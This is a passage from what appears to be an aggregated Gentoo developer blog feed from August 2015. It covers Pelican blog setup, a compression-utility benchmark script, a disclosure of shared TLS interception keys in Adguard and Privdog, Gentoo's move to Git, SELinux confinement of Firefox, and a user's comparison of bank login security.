Well something tells me @Horgix is working hard on some standardization and on the core of py3status ! I’m sure some very interesting stuff will emerge from this, so thank you !

August 16, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Updates on my Pelican adventure (August 16, 2015, 17:50 UTC)

It's been a few weeks that I switched my blog to Pelican, a static site generator build with Python. A number of adjustments have been made since, which I'll happily talk about.

The full article view on index page

One of the features I wanted was to have my latest blog post to be fully readable from the front page (called the index page within Pelican). Sadly, I could not find a plugin of setting that would do this, but I did find a plugin that I can use to work around this: the summary plugin.

Enabling the plugin was a breeze. Extract the plugin sources in the plugin/ folder, and enable it in

PLUGINS = [..., 'summary']

With this plug-in, articles can use inline comments to tell the system at which point the summary of the article stops. Usually, the summary (which is displayed on index pages) is a first paragraph (or set of paragraphs). What I do is I now manually set the summmary to the entire blog post for the latest post, and adjust later when a new post comes up.

It might be some manual labour, but it fits nicely and doesn't hack around in the code too much.

Commenting with Disqus

I had some remarks that the Disqus integration is not as intuitive as expected. Some readers had difficulties finding out how to comment as a guest (without the need to log on through popular social media or through Disqus itself).

Agreed, it is not easy to see at first sight that people need to start typing their name in the Or sign up with disqus before they can select I'd rather post as guest. As I don't have any way of controlling the format and rendered code with Disqus, I updated the theme a bit to add in two paragraphs on commenting. The first paragraph tells how to comment as guest.

The second paragraph for now informs readers that non-verified comments are put in the moderation queue. Once I get a feeling of how the spam and bots act on the commenting system, I will adjust the filters and also allow guest comments to be readily accessible (no moderation queue). Give it a few more weeks to get myself settled and I'll adjust it.

If the performance of the site is slowed down due to the Disqus javascripts: both Firefox (excuse me, Aurora) and Chromium have this at the initial load. Later, the scripts are properly cached and load in relatively fast (a quick test shows all pages I tried load in less than 2 seconds - WordPress was at 4). And if you're not interested in commenting, then you can even use NoScript or similar plugins to disallow any remote javascript.

Still, I will continue to look at how to make commenting easier. I recently allowed unmoderated comments (unless a number of keywords are added, and comments with links are also put in the moderation queue). If someone knows of another comment-like system that I could integrate I'm happy to hear about it as well.


My issue with Tipue Search has been fixed by reverting a change in (the plugin) where the URL was assigned to the loc key instead of url. It is probably a mismatch between the plugin and the theme (the change of the key was done in May in Tipue Search itself).

With this minor issue changed, the search capabilities are back on track on my blog. Enabling is was a matter of:

PLUGINS = [..., `tipue_search`]
DIRECT_TEMPLATES = ((..., 'search'))

Tags and categories

WordPress supports multiple categories, but Pelican does not. So I went through the various posts that had multiple categories and decided on a single one. While doing so, I also reduced the categories to a small set:

  • Databases
  • Documentation
  • Free Software
  • Gentoo
  • Misc
  • Security
  • SELinux

I will try to properly tag all posts so that, if someone is interested in a very particular topic, such as PostgreSQL, he can reach those posts through the tag.

August 13, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Finding a good compression utility (August 13, 2015, 17:15 UTC)

I recently came across a wiki page written by Herman Brule which gives a quick benchmark on a couple of compression methods / algorithms. It gave me the idea of writing a quick script that tests out a wide number of compression utilities available in Gentoo (usually through the app-arch category), with also a number of options (in case multiple options are possible).

The currently supported packages are:

app-arch/bloscpack      app-arch/bzip2          app-arch/freeze
app-arch/gzip           app-arch/lha            app-arch/lrzip
app-arch/lz4            app-arch/lzip           app-arch/lzma
app-arch/lzop           app-arch/mscompress     app-arch/p7zip
app-arch/pigz           app-arch/pixz           app-arch/plzip
app-arch/pxz            app-arch/rar            app-arch/rzip
app-arch/xar            app-arch/xz-utils       app-arch/zopfli

The script should keep the best compression information: duration, compression ratio, compression command, as well as the compressed file itself.

Finding the "best" compression

It is not my intention to find the most optimal compression, as that would require heuristic optimizations (which has triggered my interest in seeking such software, or writing it myself) while trying out various optimization parameters.

No, what I want is to find the "best" compression for a given file, with "best" being either

  • most reduced size (which I call compression delta in my script)
  • best reduction obtained per time unit (which I call the efficiency)

For me personally, I think I would use it for the various raw image files that I have through the photography hobby. Those image files are difficult to compress (the Nikon DS3200 I use is an entry-level camera which applies lossy compression already for its raw files) but their total size is considerable, and it would allow me to better use the storage I have available both on my laptop (which is SSD-only) as well as backup server.

But next to the best compression ratio, the efficiency is also an important metric as it shows how efficient the algorithm works in a certain time aspect. If one compression method yields 80% reduction in 5 minutes, and another one yields 80,5% in 45 minutes, then I might want to prefer the first one even though that is not the best compression at all.

Although the script could be used to get the most compression (without resolving to an optimization algorithm for the compression commands) for each file, this is definitely not the use case. A single run can take hours for files that are compressed in a handful of seconds. But it can show the best algorithms for a particular file type (for instance, do a few runs on a couple of raw image files and see which method is most succesful).

Another use case I'm currently looking into is how much improvement I can get when multiple files (all raw image files) are first grouped in a single archive (.tar). Theoretically, this should improve the compression, but by how much?

How the script works

The script does not contain much intelligence. It iterates over a wide set of compression commands that I tested out, checks the final compressed file size, and if it is better than a previous one it keeps this compressed file (and its statistics).

I tried to group some of the compressions together based on the algorithm used, but as I don't really know the details of the algorithms (it's based on manual pages and internet sites) and some of them combine multiple algorithms, it is more of a high-level selection than anything else.

The script can also only run the compressions of a single application (which I use when I'm fine-tuning the parameter runs).

A run shows something like the following:

Original file (test.nef) size 20958430 bytes
      package name                                                 command      duration                   size compr.Δ effic.:
      ------------                                                 -------      --------                   ---- ------- -------
app-arch/bloscpack                                               blpk -n 4           0.1               20947097 0.00054 0.00416
app-arch/bloscpack                                               blpk -n 8           0.1               20947097 0.00054 0.00492
app-arch/bloscpack                                              blpk -n 16           0.1               20947097 0.00054 0.00492
    app-arch/bzip2                                                   bzip2           2.0               19285616 0.07982 0.03991
    app-arch/bzip2                                                bzip2 -1           2.0               19881886 0.05137 0.02543
    app-arch/bzip2                                                bzip2 -2           1.9               19673083 0.06133 0.03211
    app-arch/p7zip                                      7za -tzip -mm=PPMd           5.9               19002882 0.09331 0.01592
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=24           5.7               19002882 0.09331 0.01640
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=25           6.4               18871933 0.09955 0.01551
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=26           7.7               18771632 0.10434 0.01364
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=27           9.0               18652402 0.11003 0.01224
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=28          10.0               18521291 0.11628 0.01161
    app-arch/p7zip                                       7za -t7z -m0=PPMd           5.7               18999088 0.09349 0.01634
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=24           5.8               18999088 0.09349 0.01617
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=25           6.5               18868478 0.09972 0.01534
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=26           7.5               18770031 0.10442 0.01387
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=27           8.6               18651294 0.11008 0.01282
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=28          10.6               18518330 0.11643 0.01100
      app-arch/rar                                                     rar           0.9               20249470 0.03383 0.03980
      app-arch/rar                                                 rar -m0           0.0               20958497 -0.00000        -0.00008
      app-arch/rar                                                 rar -m1           0.2               20243598 0.03411 0.14829
      app-arch/rar                                                 rar -m2           0.8               20252266 0.03369 0.04433
      app-arch/rar                                                 rar -m3           0.8               20249470 0.03383 0.04027
      app-arch/rar                                                 rar -m4           0.9               20248859 0.03386 0.03983
      app-arch/rar                                                 rar -m5           0.8               20248577 0.03387 0.04181
    app-arch/lrzip                                                lrzip -z          13.1               19769417 0.05673 0.00432
     app-arch/zpaq                                                    zpaq           0.2               20970029 -0.00055        -0.00252
The best compression was found with 7za -t7z -m0=PPMd:mem=28.
The compression delta obtained was 0.11643 within 10.58 seconds.
This file is now available as test.nef.7z.

In the above example, the test file was around 20 MByte. The best compression compression command that the script found was:

~$ 7za -t7z -m0=PPMd:mem=28 a test.nef.7z test.nef

The resulting file (test.nef.7z) is 18 MByte, a reduction of 11,64%. The compression command took almost 11 seconds to do its thing, which gave an efficiency rating of 0,011, which is definitely not a fast one.

Some other algorithms don't do bad either with a better efficiency. For instance:

   app-arch/pbzip2                                                  pbzip2           0.6               19287402 0.07973 0.13071

In this case, the pbzip2 command got almost 8% reduction in less than a second, which is considerably more efficient than the 11-seconds long 7za run.

Want to try it out yourself?

I've pushed the script to my github location. Do a quick review of the code first (to see that I did not include anything malicious) and then execute it to see how it works:

~$ sw_comprbest -h
Usage: sw_comprbest --infile=<inputfile> [--family=<family>[,...]] [--command=<cmd>]
       sw_comprbest -i <inputfile> [-f <family>[,...]] [-c <cmd>]

Supported families: blosc bwt deflate lzma ppmd zpaq. These can be provided comma-separated.
Command is an additional filter - only the tests that use this base command are run.

The output shows
  - The package (in Gentoo) that the command belongs to
  - The command run
  - The duration (in seconds)
  - The size (in bytes) of the resulting file
  - The compression delta (percentage) showing how much is reduced (higher is better)
  - The efficiency ratio showing how much reduction (percentage) per second (higher is better)

When the command supports multithreading, we use the number of available cores on the system (as told by /proc/cpuinfo).

For instance, to try it out against a PDF file:

~$ sw_comprbest -i MEA6-Sven_Vermeulen-Research_Summary.pdf
Original file (MEA6-Sven_Vermeulen-Research_Summary.pdf) size 117763 bytes
The best compression was found with zopfli --deflate.
The compression delta obtained was 0.00982 within 0.19 seconds.
This file is now available as MEA6-Sven_Vermeulen-Research_Summary.pdf.deflate.

So in this case, the resulting file is hardly better compressed - the PDF itself is already compressed. Let's try it against the uncompressed PDF:

~$ pdftk MEA6-Sven_Vermeulen-Research_Summary.pdf output test.pdf uncompress
~$ sw_comprbest -i test.pdf
Original file (test.pdf) size 144670 bytes
The best compression was found with lrzip -z.
The compression delta obtained was 0.27739 within 0.18 seconds.
This file is now available as test.pdf.lrz.

This is somewhat better:

~$ ls -l MEA6-Sven_Vermeulen-Research_Summary.pdf* test.pdf*
-rw-r--r--. 1 swift swift 117763 Aug  7 14:32 MEA6-Sven_Vermeulen-Research_Summary.pdf
-rw-r--r--. 1 swift swift 116606 Aug  7 14:32 MEA6-Sven_Vermeulen-Research_Summary.pdf.deflate
-rw-r--r--. 1 swift swift 144670 Aug  7 14:34 test.pdf
-rw-r--r--. 1 swift swift 104540 Aug  7 14:35 test.pdf.lrz

The resulting file is 11,22% reduced from the original one.

August 12, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

Adguard certificateIn February the discovery of a software called Superfish caused widespread attention. Superfish caused a severe security vulnerability by intercepting HTTPS connections with a Man-in-the-Middle-certificate. The certificate and the corresponding private key was shared amongst all installations.

The use of Man-in-the-Middle-proxies for traffic interception is a widespread method, an application installs a root certificate into the browser and later intercepts connections by creating signed certificates for webpages on the fly. It quickly became clear that Superfish was only the tip of the iceberg. The underlying software module Komodia was used in a whole range of applications all suffering from the same bug. Later another software named Privdog was found that also intercepted HTTPS traffic and I published a blog post explaining that it was broken in a different way: It completely failed to do any certificate verification on its connections.

In a later blogpost I analyzed several Antivirus applications that also intercept HTTPS traffic. They were not as broken as Superfish or Privdog, but all of them decreased the security of the TLS encryption in one way or another. The most severe issue was that Kaspersky was at that point still vulnerable to the FREAK bug, more than a month after it was discovered. In a comment to that blogpost I was asked about a software called Adguard. I have to apologize that it took me so long to write this up.

Different certificate, same key

The first thing I did was to install Adguard two times in different VMs and look at the root certificate that got installed into the browser. The fingerprint of the certificates was different. However a closer look revealed something interesting: The RSA modulus was the same. It turned out that Adguard created a new root certificate with a changing serial number for every installation, but it didn't generate a new key. Therefore it is vulnerable to the same attacks as Superfish.

I reported this issue to Adguard. Adguard has fixed this issue, however they still intercept HTTPS traffic.

I learned that Adguard did not always use the same key, instead it chose one out of ten different keys based on the CPU. All ten keys could easily be extracted from a file called ProtocolFilters.dll that was shipped with Adguard. Older versions of Adguard only used one key shared amongst all installations. There also was a very outdated copy of the nss library. It suffers from various vulnerabilities, however it seems they are not exploitable. The library is not used for TLS connections, its only job is to install certificates into the Firefox root store.

Meet Privdog again

The outdated nss version gave me a hint, because I had seen this before: In Privdog. I had spend some time trying to find out if Privdog would be vulnerable to known nss issues (which had the positive side effect that Filippo created proof of concept code for the BERserk vulnerability). What I didn't notice back then was the shared key issue. Privdog also used the same key amongst different installations. So it turns out Privdog was completely broken in two different ways: By sharing the private key amongst installations and by not verifying certificates.

The latest version of Privdog no longer intercepts HTTPS traffic, it works as a browser plugin now. I don't know whether this vulnerability was still present after the initial fix caused by my original blog post.

Now what is this ProtocolFilters.dll? It is a commercial software module that is supposed to be used along with a product called Netfilter SDK. I wondered where else this would be found and if we would have another widely used software module like Komodia.

ProtocolFilters.dll is mentioned a lot in the web, mostly in the context of Potentially Unwanted Applications, also called Crapware. That means software that is either preinstalled or that gets bundled with installers from other software and is often installed without users consent or by tricking the user into clicking some "ok" button without knowing that he or she agrees to install another software. Unfortunately I was unable to get my hands on any other software using it.

Lots of "Potentially Unwanted Applications" use ProtocolFilters.dll

Software names that I found that supposedly include ProtocolFilters.dll: Coupoon, CashReminder, SavingsDownloader, Scorpion Saver, SavingsbullFilter, BRApp, NCupons, Nurjax, Couponarific, delshark, rrsavings, triosir, screentk. If anyone has any of them or any other piece of software bundling ProtocolFilters.dll I'd be interested in receiving a copy.

I'm publishing all Adguard keys and the Privdog key together with example certificates here. I also created a trivial script that can be used to extract keys from ProtocolFilters.dll (or other binary files that include TLS private keys in their binary form). It looks for anything that could be a private key by its initial bytes and then calls OpenSSL to try to decode it. If OpenSSL succeeds it will dump the key.

Finally an announcement for visitors of the Chaos Communication Camp: I will give a talk about TLS interception issues and the whole story of Superfish, Privdog and friends on Sunday.

Update: Due to the storm the talk was delayed. It will happen on Monday at 12:30 in Track South.

Gentoo Package Repository now using Git (August 12, 2015, 00:00 UTC)

Good things come to those who wait: The main Gentoo package repository (also known as the Portage tree or by its historic name gentoo-x86) is now based on Git.


The Gentoo Git migration has arrived and is expected to be completed soon. As previously announced, the CVS freeze occurred on 8 August and Git commits for developers were opened soon after. As a last step, rsync mirrors are expected to have the updated changelogs again on or after 12 August. Read-only access to gentoo-x86 (and write to the other CVS repositories) was restored on 9 August following the freeze.


Work on migrating the repository from CVS to Git began in 2006 with a proof-of-concept migration project during the Summer of Code. Back then, migrating the repository took a week and using Git was considerably slower than using CVS. While plans to move were shelved for a while, things improved over the coming years. Several features were implemented in Git, Portage, and other tools to meet the requirements of a migrated repository.

What changes?

The repository can be checked out from and is available via our Git web interface.

For users of our package repository, nothing changes: Updates continue to be available via the established mechanisms (rsync, webrsync, snapshots). Options to fetch the package tree via Git are to be announced later.

The migration facilitates the process of new contributors getting involved as proxy maintainers and eventually Developers. Alternate places for users to submit pull requests, such as GitHub, can be expected in the future.

In regards to package signing, the migration will streamline how GPG keys are used. This will allow end-to-end signature tracking from the developer to the final repository, as outlined in GLEP 57 et seq.

While the last issues are being worked on, join us in thanking everyone involved in the project. As always, you can discuss this on our Forums or hit up @Gentoo.

August 11, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Why we do confine Firefox (August 11, 2015, 17:18 UTC)

If you're a bit following the SELinux development community you will know Dan Walsh, a Red Hat security engineer. Today he blogged about CVE-2015-4495 and SELinux, or why doesn't SELinux confine Firefox. He should've asked why the reference policy or Red Hat/Fedora policy does not confine Firefox, because SELinux is, as I've mentioned before, not the same as its policy.

In effect, Gentoo's SELinux policy does confine Firefox by default. One of the principles we focus on in Gentoo Hardened is to develop desktop policies in order to reduce exposure and information leakage of user documents. We might not have the manpower to confine all desktop applications, but I do think it is worthwhile to at least attempt to do this, even though what Dan Walsh mentioned is also correct: desktops are notoriously difficult to use a mandatory access control system on.

How Gentoo wants to support more confined desktop applications

What Gentoo Hardened tries to do is to support the XDG Base Directory Specification for several documentation types. Downloads are marked as xdg_downloads_home_t, pictures are marked as xdg_pictures_home_t, etc.

With those types defined, we grant the regular user domains full access to those types, but start removing access to user content from applications. Rules such as the following are commented out or removed from the policies:

# userdom_manage_user_home_content_dirs(mozilla_t)
# userdom_manage_user_home_content_files(mozilla_t)

Instead, we add in a call to a template we have defined ourselves:

userdom_user_content_access_template(mozilla, { mozilla_t mozilla_plugin_t })

This call makes access to user content optional through SELinux booleans. For instance, for the mozilla_t domain (which is used for Firefox), the following booleans are created:

# Read generic (user_home_t) user content
mozilla_read_generic_user_content       ->      true

# Read all user content
mozilla_read_all_user_content           ->      false

# Manage generic (user_home_t) user content
mozilla_manage_generic_user_content     ->      false

# Manage all user content
mozilla_manage_all_user_content         ->      false

As you can see, the default setting is that Firefox can read user content, but only non-specific types. So ssh_home_t, which is used for the SSH related files, is not readable by Firefox with our policy by default.

By changing these booleans, the policy is fine-tuned to the requirements of the administrator. On my systems, mozilla_read_generic_user_content is switched off.

You might ask how we can then still support a browser if it cannot access user content to upload or download. Well, as mentioned before, we support the XDG types. The browser is allowed to manage xdg_download_home_t files and directories. For the majority of cases, this is sufficient. I also don't mind copying over files to the ~/Downloads directory just for uploading files. But I am well aware that this is not what the majority of users would want, which is why the default is as it is.

There is much more work to be done sadly

As said earlier, the default policy will allow reading of user files if those files are not typed specifically. Types that are protected by our policy (but not by the reference policy standard) includes SSH related files at ~/.ssh and GnuPG files at ~/.gnupg. Even other configuration files, such as for my Mutt configuration (~/.muttrc) which contains a password for an IMAP server I connect to, are not reachable.

However, it is still far from perfect. One of the reasons is that many desktop applications are not "converted" yet to our desktop policy approach. Yes, Chromium is also already converted, and policies we've added such as for Skype also do not allow direct access unless the user explicitly enabled it. But Evolution for instance isn't yet.

Converting desktop policies to a more strict setup requires lots of testing, which translates to many human resources. Within Gentoo, only a few developers and contributors are working on policies, and considering that this is not a change that is already part of the (upstream) reference policy, some contributors also do not want to put lots of focus on it either. But without having done the works, it will not be easy (nor probably acceptable) to upstream this (the XDG patch has been submitted a few times already but wasn't deemed ready yet then).

Having a more restrictive policy isn't the end

As the blog post of Dan rightly mentioned, there are still quite some other ways of accessing information that we might want to protect. An application might not have access to user files, but can be able to communicate (for instance through DBus) with an application that does, and through that instruct it to pass on the data.

Plugins might require permissions which do not match with the principles set up earlier. When we tried out Google Talk (needed for proper Google Hangouts support) we noticed that it requires many, many more privileges. Luckily, we were able to write down and develop a policy for the Google Talk plugin (googletalk_plugin_t) so it is still properly confined. But this is just a single plugin, and I'm sure that more plugins exist which will have similar requirements. Which leads to more policy development.

But having workarounds does not make the effort we do worthless. Being able to work around a firewall through application data does not make the firewall useless, it is just one of the many security layers. The same is true with SELinux policies.

I am glad that we at least try to confine desktop applications more, and that Gentoo Hardened users who use SELinux are at least somewhat more protected from the vulnerability (even with the default case) and that our investment for this is sound.

August 09, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

A couple of months ago I promised a post on bank security. The topic is not an easy one to write about, as I would not say I have the chops to talk about it. After all I have never worked at a bank, and unlike Andrea I have not spent years researching into payment processing security.

I am, though, confident enough to write about some of the user side security implementations (and blunders) of banks, for the simple fact that I have had more interaction, than the average person, with multiple banks in different countries. I can thus compare notes about these different banks and countries, so I can point out what is good and what is mental in their implementations, as I see it.

If you are looking for more in-depth security analysis, such as Point-of-Sale security or Chip-and-PIN analysis, I would suggest you look up talks of people like Andrea Barisani, linked earlier, or Krebs on Security — who should probably write an ATM skimmer guide, companion to Spam Nation. Both of them spent real time digging into the inner working of banks, which I haven't done.

In my discussion of security features, I'll be accepting as valid the research on security questions, published earlier this year by Google. Not only I find the results pretty consistent with my personal experience (even though this could be counted as confirmation bias), but once again because I accept the results and information coming from people who have had more time, and more data, to think about the problem.

The objective of this blog is to discuss which security features are in use by banks to protect customers, and whether these features work towards or against that goal, but before I dig into the nitty gritty details, I think it's important to define what these security features are meant to protect in the first place. It might sound obvious, but talking about this with different people showed it not to be the case.

The obvious part is that you don't want a random attacker to gain access to your bank account and transfer your money to their account. This is the very minimal protection you expect from your bank. You also don't want people to know how much money you have, or where you spend it — leaving aside the favourite talking points of privacy advocates on the matter, knowing this kind of information is a treasure trove for blackmail.

There are many more pieces of information that should stay private, and often are not. Most people (but of course, not everybody) know to keep the number of their credit/debit card safe. What is not that obvious is that your IBAN (and BIC) should be kept secret, too — for my readers in the United States, these vaguely correspond to account numbers and ABA. People are used to see IBANs for various companies and utilities displayed on websites or invoices, explicitly so you can make payments to them, but that does not mean personal accounts should be advertised the same way. Jeremy Clarkson fell for it, too: he assumed that having someone's IBAN, Sort Code – which is actually already part of IBAN, but let's move on – and registered address would at most let people sending money to him.

What he found out is that, in addition to sending money to him, someone could set up a direct debit against his account. In this case, the "prankster" decided to set up a £500 direct debit, if my memory does not betray me, towards Diabetes UK. And he probably didn't even notice that until he went to check his statement. On the other hand, if you think of doing the same to a person on a regular income, you can easily cause them trouble. This is a kind of attack I like to call Denial-of-Cash: it is a similar attack to a Denial-of-Service — it does not gain the attacker anything directly, but it's a common tactic to set up blackmailing, or just to cause (big) inconvenience to a target. Protecting against Denial-of-Cash is in my opinion just as important as protecting against blatant theft.

As I'll show later, most banks have proper protection in place against theft, but Denial-of-Cash is a different story. Usually there is tight security against transferring money to a new account, but transfers to a known account require minimal or no security. An attacker may not be able to take the money from the victim, but they may still be able to remove economic means from the the victim, at least for a while — I say this because I'd expect most of the frequent payees would allow you to get your money back at some point, even if they are utility companies rather than family members.

You could think that nobody would have time to waste in this kind of attacks, since it still require going after access to a bank account. But then I would point out that the Internet is full of people spending time, and money, to achieve what is at best nuisance and at worst terror: (D)DoS, SWATing and doxxing. Given how much time people have to spend going after public figures they don't like, this kind of attack is far from unlikely.

Now, before I start talking about the actual security features, I should provide the list of banks I'm going to talk about. These are going to be split across four different countries: Italy, USA, Ireland and (in a very small way) UK — these being the countries I spent considerable amount of time living in, or having contact with.

My longest-serving bank is my Italian one, as I've been a customer of UniCredit Banca for well over ten years; you may know this bank from some of their branches in other european countries, including many in the former Eastern block. I doubt it shares infrastructure or security features between these branches though.

In Ireland, where I currently live, I have tried three different banks: AIB, KBC Ireland – a Belgian bank, although I'm not sure if it shares anything with their main branch – and Ulster Bank. The latter is part of RBS Group, and so is my only UK bank – Ulster Bank, Northern Ireland – and I know for sure they do share lots, if not all, the systems between them.

To complete the picture, in the United States I have and use a Chase account. I also used to have the City National Bank account, a smaller Californian bank, from when I lived in Los Angeles, but I have no idea what their systems look like at all now, so I'd rather not talk about them.

In addition to the banks themselves, I can provide some comparison with other financial services: Charles Schwab (a stock broker), Transferwise (a service that allows you to transfer money across currencies at acceptable rates and fees) and PayPal. I should probably count Tesco Ireland as well, since they are my credit card provider, but I'll just add a note later about that.

Also, before I continue, I would point out that this is already making me uneasy. My paranoia would push me to hide where my money actually is. I will continue, though, under the assumption that anything that happens would be proving my point, and I hope I have enough redundancies, so that a Denial-of-Cash attack would not really be feasible. I will also point out that my birthdate is not strictly a secret, also my mother's maiden name is not very well known and that's going to stay that way — it is obvious to the people who know me in person from Italy, but other than that there is no online connection between me and my mother. This should appear obviously relevant pretty soon.

Let's start with accessing the websites of the banks — all the six banks have an online banking system: this is actually a requirement for me, especially as I'm traveling for a good part of the year, and not even live in the country the bank is in for most of them. With the exception of Chase, the other banks provided me a numeric-only user ID.

For both KBC and Ulster Bank, the user ID was formed by my birthdate followed by four allegedly random digits; but in the particular case of Ulster Bank, you can lie on your date of birth at registration time, as I found out by making a mistake.

Chase is the only bank that let me chose my own username — they insisted in a alphanumeric one, so it's not my usual one either. Transferwise and PayPal, as they are essentially "born on the Internet", use email addresses as identifiers, which I like, since it's one fewer parameter to commit to memory, but is obviously not secret. Charles Schwab generates usernames based on names.

The situation with passwords is more interesting. The Internet companies are the ones that act the most natural by allowing a single password, with all kind of characters and a fairly high length limit. Chase is the second most sane by allowing me to select my password, although it is case-insensitive – and I'm not sure if they use a hashing that normalizes the case, do a case normalization on the client side, or if they store passwords unencrypted, I hope for one of the first two.

Ulster Bank comes third by allowing me to choose both my password (long, alphanumeric, case sensitive) and a numeric-only PIN, but then they mess it up by doing something crazy. Then it's followed by Charles Schwab (8-characters alphanumeric password), UniCredit (8-digits numeric-only PIN) and AIB (5-digits numeric-only PIN, and the same craziness as Ulster Bank). KBC is not in the list by not having a password and doing something slightly more insane, which I'll get to later.

What Ulster Bank and AIB both do, which I find crazy, is asking you to provide them with only parts of your password and/or PIN. For example, they may ask you the 1st, the 6th and the 13th characters of the password — in the case of Ulster Bank they ask three out of four digits of your PIN, and three out of at most 20 characters of your password, together, to log into their Anytime Banking website.

This is not a completely mindless choice: it finds its reasoning in dealing with phishing attacks — if you know your bank will never ask you for the full password, the attacker can only hope to get parts of it, and it's then unlikely they'll be able to enter your online banking, as they'd have to be asked exactly those characters they just phished out of you.

Unfortunately this improves security only in theory. In practice it makes it worse. The first problem is that lots of people will not consider "my bank will never ask me the full password" as an absolute truth, and because of that, phishers can still just ask for the full password and be done with it. The second problem is that it requires people to come up with passwords that are not only memorable (and those are bad passwords), but also easy to count into, for example by joining together very short words, or other similar mnemonic tricks. The third problem, which honestly bothers me the most, is that this stops me from using a password manager like LastPass to auto-fill the password for me. See also this Wired article that was published while this blog post was still in draft.

As for the phishing this technique is supposed to prevent, I'm sceptical. The base idea is that a phishing attempt would only easily get three characters from the password by phishing the form, and thus it would require an incredible luck for them to be asked exactly those three characters. I can find multiple ways to invalidate this precondition, take for example the 5-digits PIN of AIB, the phishers only have to tell the user that they were mistaken in one of the digits and then ask for new challenge, asking the two missing ones.

But even more importantly, there are more sophisticated phishing attempts — say that you are going through a malevolent VPN or proxy, the attacker can implement a pass-through to your bank and still let you access all its functions — I've seen the proof of concept for similar sites, and heard colleagues in IT security talking about similar phishing attempts. In this case the attacker only needs to make sure to not close your session when you're done, and just before the session gets interrupted by your bank, take control of it. Most people wouldn't notice the added latency, and not everybody figures out something is wrong if the full name of the bank is missing on the location bar.

These requirements thus do nearly nothing to stop cybercriminals, but they weaken both the password quality and the password management, the worst of both worlds. My suggestion, based on both experience and the research brought by other groups and experts, is to allow people to set their passwords, at least alphanumeric ones (allowing symbols is good, requiring them not so much), and stop using PINs — phishing will happen anyway, make it harder for criminals to gain access to accounts by guessing numeric 6- or 8-digits passwords, which end up most likely as dates, either date of birth of the owner, or friends and family, or simply important dates in their life.

When I started this discussion I explicitly left KBC alone; the reason for this is that they don't use passwords, and instead rely on their mobile application for authentication — and this is going to be the next topic of discussion for all the banks. To login on the KBC online banking from your computer you need first to have the mobile app configured, and log into that one. Then you can use their one-time PIN generator to use for login, together with the user ID that the bank gave you.

It may sound at first like a good idea, but it requires you to not lose access to your mobile phone, if you want to access your bank for any reason. The easy case if your phone crashes, or breaks, and you have to reset/replace it, in which case you just need to get another SMS on the registered phone to set up a new copy of the application (but it does not help if you're traveling and the phone number is not actually available.) Worse, if you get your phone stolen, you now will have to first wait for a new SIM to take control of the phone number before you can gain access to your bank account.

At this point I think it makes sense to point out that there are two "schools" in dealing with mobile banking applications: AIB, Ulster Bank, and Chase allow you to install many copies of the app on different devices, so you can always have one at hand set up to access your account. On the other hand, KBC and UniCredit only allow you to set up the application on one device, and if you need to install it on a different one you have to deauthorize the one already installed.

The best, in my opinion, mobile app is the one from Chase: you simply install it and then login with the same credentials as the online banking website. It'll ask you the password every time, but it does work fine with LastPass, and you can switch accounts as needed, which I find great.

All the other banks require setting up the application for one account only. I hope this is because they generate client-side secure credentials, but I'm too scared to actually try to figure out what the apps are doing. But nonetheless, it means that to set up the application you need access to the registered phone number. Luckily, none of them require to read the SMS out of the device store, which means you can use them on phone-like devices that can't receive SMS, or even on a device that is not configured for the given phone number.

This becomes important when you have bank accounts spanning different countries (four in my case, but only three need a local phone number); to solve this problem, I ended up buying a Nokia 130 featurephone which is dual-SIM, and allows me access to my 3 UK and Wind Italy phone numbers — if I had kept my number on 3 Italy I would have had a three-of-a-kind! This by the way works out fine unless I'm physically in the UK, as then the 3 UK can't connect, as the phone is not 3G.

If the user is tied to the device, for most bank, what password you use with it is quite different. As I said, Chase lets you login with the same credentials as the online banking, which makes it the most sane solution. AIB also follows the same setting as the website, and it allows you to login with the same three out of five digits of the PIN. UniCredit, while forcing you to register your account number with the application at setup time, it also uses the same PIN you use on the website (with no support for LastPass filling the form, but at least allowing to paste the password copied from it.

Ulster Bank and KBC instead ignore your online banking password (or precisely in the case of KBC it does not have one to begin with), and instead ask you quite explicitly for a PIN (digits only) that is tied to the device itself. I would hope that this is actually use to encrypt the client side certificate, but I'm not sure i I want to verify my hopes.

The problem with mobile PINs is, once again, that it's one more separate piece of authentication to remember. And with the exception of Chase and UniCredit, as I pointed out, none of them allow you to use LastPass to store the involved PIN. The end result is that people either re-use another set of numbers, like their birthdate, or someone else's, or even re-use the PIN of the device if there is one at all — and since figuring out the PIN based of oily pattern on the screen is far from impossible, you just have given up access to your bank account details.

Let me make something clear here: if you think that the people around you are all your friends, then you're mistaken. I would love to live in the world you're thinking of but I don't. There are bastards around you just as much as there are great people, and the people you list as "friends" on Facebook are often not. Not only my birthday is not a secret, nor should my sister's or my mother's or whatever else. Facebook makes it easy to declare important dates for you — if something is an important date never use it as your PIN! I guess I could write a post about the dangers of 8-digits PINs.

I think this is going to be already quite the post, so I'll follow up with the rest of my musings on bank security in a separate post.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Can SELinux substitute DAC? (August 09, 2015, 12:48 UTC)

A nice twitter discussion with Erling Hellenäs caught my full attention later when I was heading home: Can SELinux substitute DAC? I know it can't and doesn't in the current implementation, but why not and what would be needed?

SELinux is implemented through the Linux Security Modules framework which allows for different security systems to be implemented and integrated in the Linux kernel. Through LSM, various security-sensitive operations can be secured further through additional access checks. This criteria was made to have LSM be as minimally invasive as possible.

The LSM design

The basic LSM design paper, called Linux Security Modules: General Security Support for the Linux Kernel as presented in 2002, is still one of the better references for learning and understanding LSM. It does show that there was a whish-list from the community where LSM hooks could override DAC checks, and that it has been partially implemented through permissive hooks (not to be mistaken with SELinux' permissive mode).

